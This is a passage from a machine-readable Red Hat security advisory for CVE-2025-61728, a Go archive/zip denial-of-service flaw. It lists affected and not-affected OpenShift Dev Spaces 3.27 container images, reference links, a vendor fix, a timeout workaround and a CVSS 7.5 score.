"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
